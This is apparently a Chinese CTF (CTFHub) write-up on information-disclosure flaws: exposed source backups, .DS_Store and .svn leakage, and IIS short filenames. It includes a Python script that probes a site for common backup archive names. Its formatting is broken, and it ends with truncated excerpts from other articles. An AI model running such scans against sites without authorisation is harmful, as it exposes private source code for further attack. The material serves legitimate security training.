這些資訊洩露的漏洞只有馬虎的程式設計師才會犯,希望大家都不要犯錯哦~
這些題在ctfhub裡都可以重做噠。
可能會有馬虎的程式設計師將整個**的原始碼打包起來且放在了**目錄下,導致我們可以直接獲取**的原始碼,給我們進一步滲透提供了更加廣泛的思路。
題目給了我們常見的備份檔案欄位和字尾,那我們直接寫指令碼就行了
#! python3
import requests
url1 =
''list1 =
['web'
,'website'
,'backup'
,'back'
,'www'
,'wwwroot'
,'temp'
]list2 =
['tar'
,'tar.gz'
,'zip'
,'rar'
]for i in list1:
for j in list2:
back =
str(i)
+'.'
+str
(j) url =
str(url1)
+'/'
+ back
print
(back +
' '
, end='')
print
(len
(requests.get(url)
.text)
)print
(requests.get(url)
.status_code)
ds_store 檔案利用 .ds_store 是 mac os 儲存資料夾的自定義屬性的隱藏檔案。通過.ds_store可以知道這個目錄裡面所有檔案的清單。
直接curl或者winhex,可以找到對應的txt檔名,然後訪問就完事兒了。
參考:
記 svn檔案資訊洩露漏洞
在此之前我們了解一下.svn檔案的前世今生 0x00前世 svn檔案 subversion 是源 版本管理軟體。這玩意在管理員部署 svn checkout更新 時會產生乙個隱藏目錄 ls a 可以檢視。既然是隱藏目錄,那就可能在做許可權配置的時候漏過。這就是漏洞的成因。ps svn產生的.svn目...
資訊洩露漏洞
洩露敏感的使用者或業務資料的危險相當明顯,但洩露技術資訊有時可能同樣嚴重。儘管某些資訊用途有限,但它可能是暴露其他攻擊面的起點,其中可能包含其他有趣的漏洞。有時,敏感資訊可能會不慎洩露給僅以正常方式瀏覽 的使用者。但是,更常見的是,攻擊者需要通過以意外或惡意的方式與 進行互動來引發資訊洩露。然後,他...
漏洞修復 IIS短檔名洩露漏洞
internet information services iis,網際網路資訊服務 是由微軟公司提供的基於執行microsoft windows的網際網路基本服務。microsoft iis在實現上存在檔案列舉漏洞,攻擊者可利用此漏洞列舉網路伺服器根目錄中的檔案。危害 攻擊者可以利用 字元猜解或遍...